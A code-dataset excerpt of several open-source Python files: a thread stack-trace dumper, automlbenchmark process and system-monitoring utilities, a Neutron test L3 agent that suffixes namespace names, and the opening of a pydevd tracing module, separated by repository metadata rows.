"BSD-3-Clause"
] | 2 | 2020-11-04T08:00:37.000Z | 2020-11-06T08:33:33.000Z | import sys
import traceback
# Taken from http://bzimmer.ziclix.com/2008/12/17/python-thread-dumps/
def stacktraces():
code = []
for threadId, stack in sys._current_frames().items():
code.append("\n# ThreadID: %s" % threadId)
for filename, lineno, name, line in traceback.extract_stack(stack):
code.append('File: "%s", line %d, in %s' % (filename, lineno, name))
if line:
code.append(" %s" % (line.strip()))
return "\n".join(code)
# This part was made by nagylzs
import os
import time
import threading
class TraceDumper(threading.Thread):
    """Dump stack traces into a given file periodically."""

    def __init__(self, fpath, interval, auto):
        """
        @param fpath: File path to output HTML (stack trace file)
        @param auto: Set flag (True) to update trace continuously.
            Clear flag (False) to update only if file not exists.
            (Then delete the file to force update.)
        @param interval: In seconds: how often to update the trace file.
        """
        assert interval > 0.1  # guard against busy-looping on tiny intervals
        self.auto = auto
        self.interval = interval
        self.fpath = os.path.abspath(fpath)
        self.stop_requested = threading.Event()
        threading.Thread.__init__(self)

    def run(self):
        # Poll until stop() is requested; each pass (re)writes the dump
        # unless auto is off and the file already exists.
        # is_set(): isSet() is a deprecated alias since Python 3.10.
        while not self.stop_requested.is_set():
            time.sleep(self.interval)
            if self.auto or not os.path.isfile(self.fpath):
                self.stacktraces()

    def stop(self):
        """Stop the dumper thread and remove the trace file."""
        self.stop_requested.set()
        self.join()
        try:
            if os.path.isfile(self.fpath):
                os.unlink(self.fpath)
        except OSError:
            # BUGFIX: was a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit; only filesystem errors are expected.
            pass

    def stacktraces(self):
        """Write the current stack traces of all threads to self.fpath."""
        # `with` guarantees the file is closed even if the write fails.
        with open(self.fpath, "w+") as fout:
            fout.write(stacktraces())
_tracer = None  # module-level singleton: at most one TraceDumper at a time


def start_tracer(fpath, interval=5, auto=True):
    """Start tracing into the given file.

    :param fpath: path of the trace dump file.
    :param interval: seconds between dumps.
    :param auto: when True, rewrite the dump continuously.
    :raises Exception: if a tracer is already running.
    """
    global _tracer
    if _tracer is None:
        _tracer = TraceDumper(fpath, interval, auto)
        # daemon=True so the tracer thread never blocks interpreter shutdown.
        # BUGFIX: setDaemon() is deprecated since Python 3.10; assign the
        # equivalent `daemon` attribute instead.
        _tracer.daemon = True
        _tracer.start()
    else:
        raise Exception("Already tracing to %s"%_tracer.fpath)
def stop_tracer():
    """Stop tracing."""
    global _tracer
    if _tracer is None:
        raise Exception("Not tracing, cannot stop.")
    _tracer.stop()
    _tracer = None
| 29.04878 | 80 | 0.595298 |
ace75f5f08bb4abd9d25aebf65017e01f801e0fb | 20,220 | py | Python | amlb/utils/process.py | paxcema/automlbenchmark | d6835342ca0cef3f2df4d9e36fecf990f682412a | [
"MIT"
] | 4 | 2021-04-26T12:03:59.000Z | 2021-11-07T20:06:00.000Z | amlb/utils/process.py | paxcema/automlbenchmark | d6835342ca0cef3f2df4d9e36fecf990f682412a | [
"MIT"
] | null | null | null | amlb/utils/process.py | paxcema/automlbenchmark | d6835342ca0cef3f2df4d9e36fecf990f682412a | [
"MIT"
] | null | null | null | from concurrent.futures import ThreadPoolExecutor
from functools import reduce, wraps
import inspect
import io
import logging
import multiprocessing as mp
import os
import queue
import re
import select
import signal
import stat
import subprocess
import sys
import threading
import _thread
import traceback
import psutil
from .core import Namespace, as_list, flatten, fn_name
from .os import dir_of, to_mb
from .time import Timeout, Timer
log = logging.getLogger(__name__)
def run_subprocess(*popenargs,
                   input=None, capture_output=False, timeout=None, check=False, communicate_fn=None,
                   **kwargs):
    """
    a clone of :function:`subprocess.run` which allows custom handling of communication
    through `communicate_fn(process, input=..., timeout=...)`.

    :param popenargs: positional arguments passed to :class:`subprocess.Popen`.
    :param input: data piped to the child's stdin (mutually exclusive with a `stdin` kwarg).
    :param capture_output: capture stdout and stderr as pipes (mutually exclusive with stdout/stderr kwargs).
    :param timeout: seconds before the child is killed and :class:`subprocess.TimeoutExpired` is raised.
    :param check: raise :class:`subprocess.CalledProcessError` on a non-zero exit code.
    :param communicate_fn: optional replacement for `Popen.communicate`.
    :param kwargs: forwarded to :class:`subprocess.Popen`.
    :return: a :class:`subprocess.CompletedProcess`.
    """
    if input is not None:
        if 'stdin' in kwargs:
            raise ValueError('stdin and input arguments may not both be used.')
        kwargs['stdin'] = subprocess.PIPE
    if capture_output:
        if kwargs.get('stdout') is not None or kwargs.get('stderr') is not None:
            raise ValueError('stdout and stderr arguments may not be used '
                             'with capture_output.')
        kwargs['stdout'] = subprocess.PIPE
        kwargs['stderr'] = subprocess.PIPE

    def communicate(process, input=None, timeout=None):
        return (communicate_fn(process, input=input, timeout=timeout) if communicate_fn
                else process.communicate(input=input, timeout=timeout))

    with subprocess.Popen(*popenargs, **kwargs) as process:
        try:
            stdout, stderr = communicate(process, input, timeout=timeout)
        except subprocess.TimeoutExpired as e:
            process.kill()
            if sys.platform == 'win32':
                # On Windows the kill is asynchronous: drain the remaining
                # output onto the exception (mirrors CPython's subprocess.run).
                e.stdout, e.stderr = communicate(process)
            else:
                process.wait()
            # BUGFIX: previously re-raised with `output=stdout, stderr=stderr`,
            # but those locals are unbound when communicate() times out, which
            # turned every timeout into an UnboundLocalError. Use the partial
            # output carried by the caught exception instead (None if absent).
            raise subprocess.TimeoutExpired(process.args, timeout, output=e.stdout, stderr=e.stderr)
        except:  # noqa: E722 -- also handles kb interrupts: kill the child, then propagate
            process.kill()
            raise
        retcode = process.poll()
        if check and retcode:
            raise subprocess.CalledProcessError(retcode, process.args, output=stdout, stderr=stderr)
    return subprocess.CompletedProcess(process.args, retcode, stdout, stderr)
def as_cmd_args(*args, **kwargs):
    """Flatten positional and keyword arguments into one flat, falsy-free list
    of command line tokens (each kwarg contributes its key then its value).

    NOTE(review): the trailing `if ... else []` conditional binds to the
    *entire* concatenation, not just the kwargs term; this is harmless here
    because `*args`/`**kwargs` can never be None, so both `is None` branches
    are effectively dead code.
    """
    return list(filter(None,
                       []
                       + ([] if args is None else list(args))
                       + flatten(kwargs.items(), flatten_tuple=True) if kwargs is not None else []
                       ))
def run_cmd(cmd, *args, **kwargs):
    """Run a shell command built from `cmd` + flattened `args`/`kwargs`.

    Execution options are passed as specially-named kwargs wrapped in
    underscores (e.g. ``_timeout_=30``, ``_live_output_='line'``); any other
    kwarg becomes part of the command line. Returns ``(stdout, stderr)`` and
    re-raises :class:`subprocess.CalledProcessError` on non-zero exit.
    """
    # Defaults for the underscore-wrapped execution parameters.
    params = Namespace(
        input_str=None,
        capture_output=True,
        capture_error=True,
        bufsize=-1,
        text=True,
        live_output=False,   # one of (True, 'line', 'block', False)
        output_level=logging.DEBUG,
        error_level=logging.ERROR,
        shell=True,
        executable=None,
        env=None,
        preexec_fn=None,
        timeout=None,
        activity_timeout=None,
    )
    # Pop `_name_` kwargs into params; whatever remains becomes CLI tokens.
    for k, v in params:
        kk = '_'+k+'_'
        if kk in kwargs:
            params[k] = kwargs[kk]
            del kwargs[kk]
    cmd_args = as_cmd_args(*args, **kwargs)
    full_cmd = flatten([cmd])+cmd_args
    str_cmd = ' '.join(full_cmd)
    log.info("Running cmd `%s`", str_cmd)
    log.debug("Running cmd `%s` with input: %s", str_cmd, params.input_str)

    def live_output(process, input=None, **ignored):
        # Custom communicate_fn: echoes child output to stdout as it arrives,
        # either line by line ('line') or raw ('block'), while also collecting
        # it for the return value.
        mode = params.live_output
        if mode is True:
            mode = 'line'
        if input is not None:
            try:
                with process.stdin as stream:
                    stream.write(input)
            except BrokenPipeError:
                # child closed stdin early; not an error for our purposes
                pass
            except:
                raise

        def read_pipe(pipe, timeout):
            # select() so a silent child doesn't block the read forever
            # (bounded by params.activity_timeout).
            pipes = as_list(pipe)
            ready, *_ = select.select(pipes, [], [], timeout)
            reads = [''] * len(pipes)
            for i, p in enumerate(pipes):
                if p in ready:
                    line = p.readline()
                    if mode == 'line':
                        print(re.sub(r'\n$', '', line, count=1))
                    elif mode == 'block':
                        print(line, end='')
                    reads[i] = line
            return reads if len(pipes) > 1 else reads[0]

        # iter(callable, sentinel): keep reading until both pipes return ''
        # (i.e. EOF on stdout and stderr simultaneously).
        output, error = zip(*iter(lambda: read_pipe([process.stdout if process.stdout else 1,
                                                     process.stderr if process.stderr else 2], params.activity_timeout),
                                  ['', '']))
        print()  # ensure that the log buffer is flushed at the end
        return ''.join(output), ''.join(error)

    try:
        completed = run_subprocess(str_cmd if params.shell else full_cmd,
                                   input=params.input_str,
                                   timeout=params.timeout,
                                   check=True,
                                   communicate_fn=live_output if params.live_output and params.capture_output else None,
                                   # stdin=subprocess.PIPE if params.input_str is not None else None,
                                   stdout=subprocess.PIPE if params.capture_output else None,
                                   stderr=subprocess.PIPE if params.capture_error else None,
                                   shell=params.shell,
                                   bufsize=params.bufsize,
                                   universal_newlines=params.text,
                                   executable=params.executable,
                                   env=params.env,
                                   preexec_fn=params.preexec_fn)
        if completed.stdout:
            log.log(params.output_level, completed.stdout)
        if completed.stderr:
            log.log(params.error_level, completed.stderr)
        return completed.stdout, completed.stderr
    except subprocess.CalledProcessError as e:
        # Log the child's output before propagating the failure.
        if e.stdout:
            log.log(params.output_level, e.stdout)
        if e.stderr:
            log.log(params.error_level, e.stderr)
        # error_tail = tail(e.stderr, 25) if e.stderr else 'Unknown Error'
        # raise subprocess.SubprocessError("Error when running command `{cmd}`: {error}".format(cmd=full_cmd, error=error_tail))
        raise e
def run_script(script_path, *args, **kwargs):
    """Make the script executable (chmod +x for the owner), then run it."""
    os.chmod(script_path, os.stat(script_path).st_mode | stat.S_IEXEC)
    return run_cmd(script_path, *args, **kwargs)
def call_script_in_same_dir(caller_file, script_file, *args, **kwargs):
    """Run `script_file` located in the same directory as `caller_file`."""
    return run_script(os.path.join(dir_of(caller_file), script_file), *args, **kwargs)
def get_thread(tid=None):
    """Resolve a thread by convention: None -> current thread, 0 -> main
    thread, otherwise the live thread whose ident equals `tid`
    (raises StopIteration if no such thread is alive)."""
    if tid is None:
        return threading.current_thread()
    if tid == 0:
        return threading.main_thread()
    return next(t for t in threading.enumerate() if t.ident == tid)
def get_process(pid=None):
    """Resolve a psutil.Process by convention: None -> this process,
    0 -> parent process, otherwise the given pid.
    Returns None when the pid does not exist."""
    if pid is None:
        pid = os.getpid()
    elif pid == 0:
        pid = os.getppid()
    return psutil.Process(pid) if psutil.pid_exists(pid) else None
def kill_proc_tree(pid=None, include_parent=True, timeout=None, on_terminate=None):
    """Terminate (then kill) a process and all its descendants.

    :param pid: target process (None -> current process, 0 -> parent; see get_process).
    :param include_parent: also terminate the target process itself.
    :param timeout: seconds to wait for graceful termination before SIGKILL.
    :param on_terminate: optional callback invoked for each terminated process.

    NOTE(review): if the pid does not exist, get_process returns None and the
    `.children` call below raises AttributeError — confirm callers guard this.
    """
    def on_proc_terminated(proc):
        log.info("Process %s terminated with exit code %s", proc, proc.returncode)
        if on_terminate is not None:
            on_terminate(proc)
    parent = get_process(pid)
    children = parent.children(recursive=True)
    if include_parent:
        children.append(parent)
    # First a polite terminate (SIGTERM) for everything...
    for proc in children:
        log.warning("Terminating process %s.", proc)
        proc.terminate()
    terminated, alive = psutil.wait_procs(children, timeout=timeout, callback=on_proc_terminated)
    # ...then a hard kill (SIGKILL) for whatever survived the timeout.
    for proc in alive:
        log.warning("Killing process %s.", proc)
        proc.kill()
def call_in_subprocess(target, *args, **kwargs):
    """Run `target(*args, **kwargs)` in a child process and return its result.

    Exceptions raised by `target` are transported back and re-raised here.
    :raises Exception: if the child dies without producing any result.
    """
    def call_target(q, *args, **kwargs):
        # Runs in the child: push either the result or the raised exception.
        try:
            result = target(*args, **kwargs)
            q.put_nowait(result)
        except BaseException as e:
            log.exception(e)
            q.put_nowait(e)

    q = mp.Queue(maxsize=1)
    p = mp.Process(target=call_target, args=(q, *args), kwargs=kwargs)
    try:
        p.start()
        # BUGFIX: the previous version joined the child *before* reading the
        # queue. That deadlocks whenever the result is larger than the pipe
        # buffer (the child blocks flushing the queue and never exits — see
        # the multiprocessing "joining processes that use queues" guideline),
        # and a bare get_nowait() after join() could also miss a result still
        # in flight. Poll the queue instead, watching for the child's death.
        result = None
        received = False
        while not received:
            try:
                result = q.get(timeout=0.1)
                received = True
            except queue.Empty:
                if not p.is_alive():
                    # child already exited: drain any result that raced with it
                    try:
                        result = q.get_nowait()
                        received = True
                    except queue.Empty:
                        raise Exception("Subprocess running {} died abruptly.".format(target.__name__))
        p.join()
        if isinstance(result, BaseException):
            raise result
        return result
    except BaseException:
        try:
            kill_proc_tree(p.pid)
        except:
            pass
        raise
def system_cores():
    """Number of logical CPUs on this machine (psutil.cpu_count default)."""
    return psutil.cpu_count()
def system_memory_mb():
    """System virtual memory as a Namespace: total/available in MB plus
    the used percentage as reported by psutil."""
    vm = psutil.virtual_memory()
    return Namespace(
        total=to_mb(vm.total),
        available=to_mb(vm.available),
        used_percentage=vm.percent
    )
def system_volume_mb(root="/"):
    """Disk usage of the volume holding `root` as a Namespace:
    total/free/used in MB plus the used percentage."""
    du = psutil.disk_usage(root)
    return Namespace(
        total=to_mb(du.total),
        free=to_mb(du.free),
        used=to_mb(du.used),
        used_percentage=du.percent
    )
def signal_handler(sig, handler):
    """
    Install a one-shot handler: `handler` runs once when `sig` is raised in
    the current thread, then the previously installed handler is restored.

    :param sig: a signal as defined in https://docs.python.org/3.7/library/signal.html#module-contents
    :param handler: a handler function executed when the given signal is raised in the current thread.
    """
    # Pre-bind so the closure never sees an undefined name, even if the
    # signal fires between installation below and the assignment of the
    # previous handler.
    previous = None

    def one_shot(signum, frame):
        try:
            handler()
        finally:
            # restore previous signal handler (default action if none was set)
            signal.signal(sig, previous or signal.SIG_DFL)

    previous = signal.signal(sig, one_shot)
def raise_in_thread(thread_id, exc):
    """
    Asynchronously raise an exception in another thread via the CPython C API.

    :param thread_id: the thread in which the exception will be raised.
    :param exc: the exception to raise in the thread: it can be an exception class or an instance.
    """
    import ctypes
    tid = ctypes.c_long(thread_id)
    # PyThreadState_SetAsyncExc only accepts an exception *class*, so an
    # instance is wrapped into a throwaway subclass whose __init__ bakes in
    # the instance's message.
    exc_class = exc if inspect.isclass(exc) else type(exc.__class__.__name__, (exc.__class__,), dict(
        __init__=lambda s: super(s.__class__, s).__init__(str(exc))
    ))
    exc_class = ctypes.py_object(exc_class)
    ret = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, exc_class)
    if ret == 0:
        # no thread state matched the id
        raise ValueError(f"Nonexistent thread {thread_id}")
    elif ret > 1:
        # more than one thread state was modified: undo the damage and bail
        ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)
        raise SystemError(f"Failed raising exception in thread {thread_id}")
class InterruptTimeout(Timeout):
    """
    A :class:`Timeout` implementation that can send a signal to the interrupted thread or process,
    or raise an exception in the thread (works only for thread interruption)
    if the passed signal is an exception class or instance.
    """

    def __init__(self, timeout_secs, message=None, log_level=logging.WARNING,
                 interrupt='thread', sig=signal.SIGINT, ident=None, before_interrupt=None):
        def interruption():
            # Runs when the timeout fires (from the Timeout machinery).
            log.log(log_level, self.message)
            if before_interrupt is not None:
                before_interrupt()
            if interrupt == 'thread':
                if isinstance(self.sig, (type(None), BaseException)):
                    # exception-based interruption: inject into the thread
                    raise_in_thread(self.ident, TimeoutError(self.message) if self.sig is None else self.sig)
                else:
                    # _thread.interrupt_main()
                    signal.pthread_kill(self.ident, self.sig)
            elif interrupt == 'process':
                os.kill(self.ident, self.sig)

        super().__init__(timeout_secs, on_timeout=interruption)
        if interrupt not in ['thread', 'process']:
            raise ValueError("`interrupt` value should be one of ['thread', 'process'].")
        if message is None:
            # NOTE(review): `self.ident` is read here before it is assigned
            # below; reaching this branch (explicit non-zero ident and no
            # message) looks like it would raise AttributeError — confirm.
            desc = 'current' if ident is None else 'main' if ident == 0 else self.ident
            self.message = f"Interrupting {interrupt} {desc} after {timeout_secs}s timeout."
        else:
            self.message = message
        self.ident = get_thread(ident).ident if interrupt == 'thread' else get_process(ident).pid
        # An exception class is instantiated with the message; instances and
        # plain signal numbers are kept as-is.
        self.sig = sig(self.message) if inspect.isclass(sig) and BaseException in inspect.getmro(sig) else sig

    def __exit__(self, exc_type, exc_val, exc_tb):
        super().__exit__(exc_type, exc_val, exc_tb)
        if self.timed_out:
            if isinstance(self.sig, BaseException):
                # surface the timeout as the configured exception
                raise self.sig
            elif self.sig is None:
                # swallow the injected TimeoutError: treat as handled
                return True
class Monitoring:
    """Context manager running `_check_state` periodically on a worker thread.

    Subclasses override `_check_state`; a frequency <= 0 disables monitoring.
    """

    def __init__(self, name=None, frequency_seconds=300, check_on_exit=False, thread_prefix="monitoring_"):
        self._exec = None                      # ThreadPoolExecutor while active, else None
        self._name = name or os.getpid()       # label used by subclasses in log lines
        self._frequency = frequency_seconds
        self._thread_prefix = thread_prefix
        self._interrupt = threading.Event()    # set to stop the monitor loop
        self._check_on_exit = check_on_exit

    def __enter__(self):
        if self._frequency > 0:
            self._interrupt.clear()
            self._exec = ThreadPoolExecutor(max_workers=1, thread_name_prefix=self._thread_prefix)
            self._exec.submit(self._monitor)
        return self

    def __exit__(self, *args):
        if self._exec is not None:
            # signal the loop first so shutdown(wait=False) doesn't leave it running
            self._interrupt.set()
            self._exec.shutdown(wait=False)
            if self._check_on_exit:
                self._check_state()
            self._exec = None

    def _monitor(self):
        # Worker loop: check, then sleep interruptibly on the event.
        while not self._interrupt.is_set():
            try:
                self._check_state()
            except Exception as e:
                # monitoring must never kill the worker thread
                log.exception(e)
            finally:
                self._interrupt.wait(self._frequency)

    def _check_state(self):
        # Overridden by subclasses; the base class monitors nothing.
        pass
class CPUMonitoring(Monitoring):
    """Periodically log CPU utilization via psutil.

    With `use_interval`, sampling blocks for `frequency_seconds` inside psutil
    instead of sleeping in the base-class loop (hence frequency 0 below).
    """

    def __init__(self, name=None, frequency_seconds=300, check_on_exit=False,
                 use_interval=False, per_cpu=False, verbosity=0, log_level=logging.INFO):
        super().__init__(name=name,
                         frequency_seconds=0 if use_interval else frequency_seconds,
                         check_on_exit=check_on_exit,
                         thread_prefix="cpu_monitoring_")
        self._interval = frequency_seconds if use_interval else None
        self._per_cpu = per_cpu
        self._verbosity = verbosity
        self._log_level = log_level

    def _check_state(self):
        # verbosity 0: overall percentage; >0: per-mode (user/system/...) breakdown
        if self._verbosity == 0:
            percent = psutil.cpu_percent(interval=self._interval, percpu=self._per_cpu)
            log.log(self._log_level, "[%s] CPU Utilization: %s%%", self._name, percent)
        elif self._verbosity > 0:
            percent = psutil.cpu_times_percent(interval=self._interval, percpu=self._per_cpu)
            log.log(self._log_level, "[%s] CPU Utilization (in percent):\n%s", self._name, percent)


class MemoryMonitoring(Monitoring):
    """Periodically log memory usage (percentage, MB, or raw bytes by verbosity)."""

    def __init__(self, name=None, frequency_seconds=300, check_on_exit=False,
                 verbosity=0, log_level=logging.INFO):
        super().__init__(name=name,
                         frequency_seconds=frequency_seconds,
                         check_on_exit=check_on_exit,
                         thread_prefix="memory_monitoring_")
        self._verbosity = verbosity
        self._log_level = log_level

    def _check_state(self):
        if self._verbosity == 0:
            percent = system_memory_mb().used_percentage
            log.log(self._log_level, "[%s] Memory Usage: %s%%", self._name, percent)
        elif self._verbosity == 1:
            mem = system_memory_mb()
            log.log(self._log_level, "[%s] Memory Usage (in MB): %s", self._name, mem)
        elif self._verbosity > 1:
            mem = psutil.virtual_memory()
            log.log(self._log_level, "[%s] Memory Usage (in Bytes): %s",self._name, mem)


class VolumeMonitoring(Monitoring):
    """Periodically log disk usage of `root` (percentage, MB, or raw bytes)."""

    def __init__(self, name=None, frequency_seconds=300, check_on_exit=False, root="/",
                 verbosity=0, log_level=logging.INFO):
        super().__init__(name=name,
                         frequency_seconds=frequency_seconds,
                         check_on_exit=check_on_exit,
                         thread_prefix="volume_monitoring_")
        self._root = root
        self._verbosity = verbosity
        self._log_level = log_level

    def _check_state(self):
        if self._verbosity == 0:
            percent = system_volume_mb(self._root).used_percentage
            log.log(self._log_level, "[%s] Disk Usage: %s%%", self._name, percent)
        elif self._verbosity == 1:
            du = system_volume_mb(self._root)
            log.log(self._log_level, "[%s] Disk Usage (in MB): %s", self._name, du)
        elif self._verbosity > 1:
            du = psutil.disk_usage(self._root)
            log.log(self._log_level, "[%s] Disk Usage (in Bytes): %s", self._name, du)
class OSMonitoring(Monitoring):
    """Aggregate monitor that fans out to CPU/memory/volume monitors,
    selected by the `statistics` collection."""

    def __init__(self, name=None, frequency_seconds=300, check_on_exit=False,
                 statistics=('cpu', 'memory', 'volume'), verbosity=0, log_level=logging.INFO):
        super().__init__(name=name, frequency_seconds=frequency_seconds, check_on_exit=check_on_exit)
        available = (('cpu', CPUMonitoring),
                     ('memory', MemoryMonitoring),
                     ('volume', VolumeMonitoring))
        self.monitors = [monitor_cls(name=name, frequency_seconds=frequency_seconds,
                                     verbosity=verbosity, log_level=log_level)
                         for key, monitor_cls in available if key in statistics]

    def _check_state(self):
        # Delegate one sampling pass to every configured sub-monitor.
        for sub_monitor in self.monitors:
            sub_monitor._check_state()
class MemoryProfiler:
    """Context manager measuring process memory (uss/rss/vms) around a block."""

    def __init__(self, process=None, enabled=True):
        """
        :param process: psutil.Process to sample; defaults to the current process.
        :param enabled: when False, the profiler is a no-op and usage() returns None.
        """
        # BUGFIX: the default used to be `process=psutil.Process()`, which is
        # evaluated once at import time — a single shared snapshot object for
        # every call, and importing this module failed outright whenever
        # psutil could not build it. Resolve the default lazily instead.
        if enabled:
            self.ps = process if process is not None else psutil.Process()
        else:
            self.ps = None
        self.before_mem = None
        self.after_mem = None

    def __enter__(self):
        if self.ps is not None:
            self.before_mem = self.ps.memory_full_info()
        return self

    def __exit__(self, *args):
        if self.ps is not None:
            self.after_mem = self.ps.memory_full_info()

    def usage(self):
        """Namespace of current memory values and deltas (in MB) since
        __enter__, or None when the profiler is disabled."""
        if self.ps is not None:
            # outside the context (no __exit__ yet), sample on demand
            mem = self.after_mem if self.after_mem is not None else self.ps.memory_full_info()
            return Namespace(
                process_diff=to_mb(mem.uss-self.before_mem.uss),
                process=to_mb(mem.uss),
                resident_diff=to_mb(mem.rss-self.before_mem.rss),
                resident=to_mb(mem.rss),
                virtual_diff=to_mb(mem.vms-self.before_mem.vms),
                virtual=to_mb(mem.vms)
            )
def obj_size(o):
    """Best-effort size of `o` in bytes: 0 for None, the `nbytes` buffer size
    for numpy-like objects, otherwise sys.getsizeof (with -1 as fallback)."""
    if o is None:
        return 0
    # numpy arrays & friends report their raw buffer size via `nbytes`
    if hasattr(o, 'nbytes'):
        return o.nbytes
    return sys.getsizeof(o, -1)
def profile(logger=log, log_level=None, duration=True, memory=True):
    """Decorator factory logging a function's wall-clock duration and memory
    deltas at `log_level` (defaults to TRACE if available, else DEBUG).

    NOTE(review): the `nonlocal log_level` assignment below caches the
    resolved level after the first call of each decorated function — changing
    logging.TRACE availability afterwards has no effect; confirm intended.
    """
    def decorator(fn):
        @wraps(fn)
        def profiler(*args, **kwargs):
            nonlocal log_level
            log_level = log_level or (logging.TRACE if hasattr(logging, 'TRACE') else logging.DEBUG)
            if not logger.isEnabledFor(log_level):
                # profiling disabled at this level: zero-overhead passthrough
                return fn(*args, **kwargs)

            with Timer(enabled=duration) as t, MemoryProfiler(enabled=memory) as m:
                ret = fn(*args, **kwargs)
            name = fn_name(fn)
            if duration:
                logger.log(log_level, "[PROFILING] `%s` executed in %.3fs.", name, t.duration)
            if memory:
                ret_size = obj_size(ret)
                if ret_size > 0:
                    logger.log(log_level, "[PROFILING] `%s` returned object size: %.3f MB.", name, to_mb(ret_size))
                mem = m.usage()
                logger.log(log_level, "[PROFILING] `%s` memory change; process: %+.2f MB/%.2f MB, resident: %+.2f MB/%.2f MB, virtual: %+.2f MB/%.2f MB.",
                           name, mem.process_diff, mem.process, mem.resident_diff, mem.resident, mem.virtual_diff, mem.virtual)
            return ret
        return profiler
    return decorator
ace75ff3c2e47590ae2af07244fd68e5b296c172 | 3,708 | py | Python | neutron/tests/common/agents/l3_agent.py | knodir/neutron | ac4e28478ac8a8a0c9f5c5785f6a6bcf532c66b8 | [
"Apache-2.0"
] | 1 | 2018-10-19T01:48:37.000Z | 2018-10-19T01:48:37.000Z | neutron/tests/common/agents/l3_agent.py | knodir/neutron | ac4e28478ac8a8a0c9f5c5785f6a6bcf532c66b8 | [
"Apache-2.0"
] | 5 | 2019-08-14T06:46:03.000Z | 2021-12-13T20:01:25.000Z | neutron/tests/common/agents/l3_agent.py | knodir/neutron | ac4e28478ac8a8a0c9f5c5785f6a6bcf532c66b8 | [
"Apache-2.0"
] | 2 | 2020-03-15T01:24:15.000Z | 2020-07-22T20:34:26.000Z | #!/usr/bin/env python
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sys
import types
import mock
from oslo_config import cfg
from neutron.agent.l3 import agent
from neutron.agent.l3 import namespaces
from neutron.agent import l3_agent
from neutron.common import constants
class L3NATAgentForTest(agent.L3NATAgentWithStateReport):
    """L3 agent variant that appends a per-agent suffix to every namespace
    name, so two agents can serve the same router on one node without their
    namespaces colliding."""

    def __init__(self, host, conf=None):
        ns_suffix = '@%s' % cfg.CONF.test_namespace_suffix

        # Mock out building of namespace names
        orig_build_ns_name = namespaces.build_ns_name

        def build_ns_name(prefix, identifier):
            # append the suffix to whatever the real implementation produces
            return "%s%s" % (orig_build_ns_name(prefix, identifier), ns_suffix)

        build_ns = mock.patch.object(namespaces, 'build_ns_name').start()
        build_ns.side_effect = build_ns_name

        # Mock the parsing prefix from namespace names
        orig_get_prefix = namespaces.get_prefix_from_ns_name

        def get_prefix_from_ns_name(ns_name):
            # only recognize namespaces carrying *this* agent's suffix;
            # others fall through to None (implicit return)
            if ns_name.endswith(ns_suffix):
                return orig_get_prefix(ns_name[:-len(ns_suffix)])

        parse_prefix = mock.patch.object(namespaces,
                                         'get_prefix_from_ns_name').start()
        parse_prefix.side_effect = get_prefix_from_ns_name

        # Mock the parsing id from namespace names
        orig_get_id = namespaces.get_id_from_ns_name

        def get_id_from_ns_name(ns_name):
            if ns_name.endswith(ns_suffix):
                return orig_get_id(ns_name[:-len(ns_suffix)])

        parse_id = mock.patch.object(namespaces, 'get_id_from_ns_name').start()
        parse_id.side_effect = get_id_from_ns_name

        super(L3NATAgentForTest, self).__init__(host, conf)

    def _create_router(self, router_id, router):
        """Create a router with suffix added to the router namespace name.

        This is needed to be able to run two agents serving the same router
        on the same node.
        """
        router = (
            super(L3NATAgentForTest, self)._create_router(router_id, router))
        # rebind the device-name helpers so interface names are suffixed too
        router.get_internal_device_name = types.MethodType(
            get_internal_device_name, router)
        router.get_external_device_name = types.MethodType(
            get_external_device_name, router)
        return router
def _append_suffix(dev_name):
    """Replace the last 4 chars of a device name with '_' plus the last 3
    chars of the configured namespace suffix, keeping the overall length."""
    # If dev_name = 'xyz123' and the suffix is 'hostB' then the result
    # will be 'xy_stB'
    return '%s_%s' % (dev_name[:-4], cfg.CONF.test_namespace_suffix[-3:])
def get_internal_device_name(ri, port_id):
    """Suffixed internal-interface device name for a router port, truncated
    to the Linux interface-name length limit before suffixing."""
    return _append_suffix(
        (namespaces.INTERNAL_DEV_PREFIX + port_id)
        [:constants.LINUX_DEV_LEN])
def get_external_device_name(ri, port_id):
    """Suffixed external (gateway) device name for a router port, truncated
    to the Linux interface-name length limit before suffixing."""
    return _append_suffix(
        (namespaces.EXTERNAL_DEV_PREFIX + port_id)
        [:constants.LINUX_DEV_LEN])
# Extra config option: the suffix appended to every namespace/device name.
OPTS = [
    cfg.StrOpt('test_namespace_suffix', default='testprefix',
               help="Suffix to append to all namespace names."),
]


def register_opts(conf):
    """Register this module's options on the given oslo.config object."""
    conf.register_opts(OPTS)


def main(manager='neutron.tests.common.agents.l3_agent.L3NATAgentForTest'):
    """Entry point: run the standard l3 agent with the test manager class."""
    register_opts(cfg.CONF)
    l3_agent.main(manager=manager)


if __name__ == "__main__":
    sys.exit(main())
| 32.243478 | 79 | 0.692557 |
ace760596f541a5dea7640587f44a15d7febfbce | 8,341 | py | Python | pyy1/.pycharm_helpers/pydev/_pydevd_bundle/pydevd_trace_dispatch_regular.py | pyy1988/pyy_test1 | 6bea878409e658aa87441384419be51aaab061e7 | [
"Apache-2.0"
] | null | null | null | pyy1/.pycharm_helpers/pydev/_pydevd_bundle/pydevd_trace_dispatch_regular.py | pyy1988/pyy_test1 | 6bea878409e658aa87441384419be51aaab061e7 | [
"Apache-2.0"
] | null | null | null | pyy1/.pycharm_helpers/pydev/_pydevd_bundle/pydevd_trace_dispatch_regular.py | pyy1988/pyy_test1 | 6bea878409e658aa87441384419be51aaab061e7 | [
"Apache-2.0"
] | 1 | 2019-02-06T14:50:03.000Z | 2019-02-06T14:50:03.000Z | import traceback
from _pydev_bundle.pydev_is_thread_alive import is_thread_alive
from _pydev_imps._pydev_saved_modules import threading
from _pydevd_bundle.pydevd_constants import get_thread_id
from _pydevd_bundle.pydevd_dont_trace_files import DONT_TRACE
from _pydevd_bundle.pydevd_kill_all_pydevd_threads import kill_all_pydev_threads
from pydevd_file_utils import get_abs_path_real_path_and_base_from_frame, NORM_PATHS_AND_BASE_CONTAINER
from _pydevd_bundle.pydevd_tracing import SetTrace
# IFDEF CYTHON
# # In Cython, PyDBAdditionalThreadInfo is bundled in the file.
# from cpython.object cimport PyObject
# from cpython.ref cimport Py_INCREF, Py_XDECREF
# ELSE
